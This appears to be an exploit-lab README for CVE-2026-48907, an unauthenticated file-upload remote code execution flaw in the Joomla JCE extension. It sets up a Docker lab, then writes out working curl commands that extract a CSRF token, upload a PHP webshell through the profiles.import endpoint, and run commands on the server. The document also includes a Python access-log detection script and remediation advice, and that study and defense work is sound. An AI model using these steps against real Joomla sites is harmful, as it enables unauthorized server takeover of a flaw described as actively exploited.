## https://sploitus.com/exploit?id=8AC491E4-591B-5C56-8013-7E0DC7148722
# CVE-2026-48907 — Joomla JCE Unauthenticated RCE Lab

> **PSsec** Educational security research lab for CVE-2026-48907.

---

## Overview

**CVE-2026-48907** is a critical (CVSS 10.0) unauthenticated remote code execution vulnerability in **JCE (Joomla Content Editor)**, the most widely installed editor extension for Joomla, affecting all versions **≤ 2.9.99.4**.

The `profiles.import` endpoint accepts file uploads with zero authentication. An attacker can upload a malicious PHP file disguised as an XML profile, which gets written to the server's `tmp/` directory and executed directly via HTTP — no credentials required.

| Detail | Value |
|---|---|
| **CVE** | CVE-2026-48907 |
| **CVSS Score** | 10.0 Critical |
| **Affected Versions** | JCE ≤ 2.9.99.4 |
| **Fixed Versions** | JCE ≥ 2.9.99.5 |
| **CISA KEV Listed** | Yes — June 16, 2026 |
| **Actively Exploited** | Yes |

---

## Lab Setup

### Prerequisites

- Docker + Docker Compose
- Kali Linux (or any Linux host)

### 1. Start the vulnerable environment

```bash
docker compose up -d
```

### 2. Complete the Joomla installer

Open `http://localhost:8080` in your browser and complete the setup wizard using these credentials:

| Field | Value |
|---|---|
| Database Host | `db` |
| Database Name | `joomla` |
| Database User | `joomla` |
| Database Password | `joomlapass` |

### 3. Install the vulnerable JCE extension

```bash
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip
```

Then in Joomla Admin → **System → Extensions → Install** → upload the ZIP.

---

## Exploitation

### 4. Extract CSRF token and session cookie

```bash
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
  | sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
  | head -n1)
```

### 5. Upload PHP webshell via unauthenticated profile import

```bash
curl -i -s -b cookies.txt -c cookies.txt \
  -F "profile_file=@shell.xml.php;type=application/xml" \
  -F "task=profiles.import" \
  -F "${TOKEN}=1" \
  "$URL/index.php?option=com_jce"
```

### 6. Verify remote code execution

```bash
curl -i -s -b cookies.txt -c cookies.txt \
  "$URL/tmp/shell.xml.php?cmd=id"
```

Expected output: `uid=33(www-data) gid=33(www-data)`
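
For defenders, steps 5 and 6 leave a recognizable trace in the web server access log: a POST to `index.php?option=com_jce` followed by a request for a `.php` file under `tmp/`. The detection script below is an added example, not part of the original lab; it assumes Combined Log Format, Joomla served from the web root as in this lab, and sample log lines constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample lines (not from a real server); IPs are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2026:10:00:01 +0000] "GET / HTTP/1.1" 200 9123 "-" "curl/8.5.0"
198.51.100.7 - - [01/Jan/2026:10:00:02 +0000] "POST /index.php?option=com_jce HTTP/1.1" 200 512 "-" "curl/8.5.0"
198.51.100.7 - - [01/Jan/2026:10:00:03 +0000] "GET /tmp/shell.xml.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.5.0"
203.0.113.9 - - [01/Jan/2026:10:05:00 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2026:10:06:00 +0000] "GET /tmp/probe.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""

def scan(log_text):
    """Return one finding per request for a PHP file directly under /tmp/.

    Each finding is correlated with an earlier POST to com_jce from the same
    client IP. The task=profiles.import field travels in the POST body, so the
    access log only shows option=com_jce in the query string.
    """
    jce_posts = {}   # ip -> timestamp of first POST to com_jce
    findings = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, method, target, status = m.groups()
        url = urlsplit(target)
        query = parse_qs(url.query)
        if method == "POST" and "com_jce" in query.get("option", []):
            jce_posts.setdefault(ip, ts)
        # Joomla's tmp/ directory has no legitimate reason to serve PHP.
        if re.match(r"/tmp/[^/]+\.php$", url.path, re.I):
            findings.append({
                "ip": ip, "time": ts, "path": url.path, "status": int(status),
                "executed": status == "200",        # file existed and was served
                "after_jce_post": ip in jce_posts,  # same client hit com_jce first
            })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with both `executed` and `after_jce_post` set matches the upload-then-execute sequence shown in this lab; a `.php` request under `tmp/` on its own is still worth reviewing, since the dropped file may be requested from a different address than the one that uploaded it.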

---

## Files

| File | Description |
|---|---|
| `docker-compose.yml` | Spins up vulnerable Joomla 5.3.1 + MySQL 8.0 |
| `shell.xml.php` | Minimal PHP webshell payload |
| `instructions.txt` | Step-by-step exploitation notes |

---

## Remediation

Update JCE to **version 2.9.99.5 or later** immediately.

Official vendor advisory and free patch for older Joomla versions:
**[JCE Security Update — joomlacontenteditor.net](https://www.joomlacontenteditor.net/news/jce-security-update-and-a-free-patch-for-older-sites)**

---

## Credits

- Exploit tooling reference: [**JoomlaSniper by ynsmroztas**](https://github.com/ynsmroztas/JoomlaSniper)
- Vulnerability discovered in the wild by Phil Taylor of mySites.guru
- CISA KEV listing: June 16, 2026

---

## Disclaimer

> This repository is intended **strictly for educational and authorized security research purposes**.
> 
> Testing must only be performed against systems you **own or have explicit written permission** to test. Unauthorized use of this material against systems you do not own is illegal and unethical. The authors and Pansophical OU accept no liability for misuse of this content.
> 
> This lab environment is intentionally vulnerable. **Do not expose it to the internet or any untrusted network.**

---

*By [PSsec](https://pssec.io)*